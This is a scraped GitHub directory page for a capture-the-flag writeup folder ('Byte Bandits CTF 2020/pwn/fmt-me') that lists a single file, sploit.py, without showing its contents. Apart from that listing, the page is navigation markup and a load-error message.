<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> KEERRO </span> <span>/</span> ctf-writeups
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>4</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>27</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>2</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>1</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/KEERRO/ctf-writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":162845937,"originating_url":"https://github.com/KEERRO/ctf-writeups/tree/master/Byte%20Bandits%20CTF%202020/pwn/fmt-me","user_id":null}}" data-hydro-click-hmac="38430b45cd31ad18e0fc14e3972b738867db20d4b966aa5a93c942cc245d73d8"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/KEERRO/ctf-writeups/refs" cache-key="v0:1647876588.2277062" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="S0VFUlJPL2N0Zi13cml0ZXVwcw==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/KEERRO/ctf-writeups/refs" cache-key="v0:1647876588.2277062" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="S0VFUlJPL2N0Zi13cml0ZXVwcw==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>ctf-writeups</span></span></span><span>/</span><span><span>Byte Bandits CTF 2020</span></span><span>/</span><span><span>pwn</span></span><span>/</span>fmt-me<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>ctf-writeups</span></span></span><span>/</span><span><span>Byte Bandits CTF 2020</span></span><span>/</span><span><span>pwn</span></span><span>/</span>fmt-me<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/KEERRO/ctf-writeups/tree-commit/06bbaff46db8a3bdd138b18de938f9440e4e83b8/Byte%20Bandits%20CTF%202020/pwn/fmt-me" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/KEERRO/ctf-writeups/file-list/master/Byte%20Bandits%20CTF%202020/pwn/fmt-me"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>sploit.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
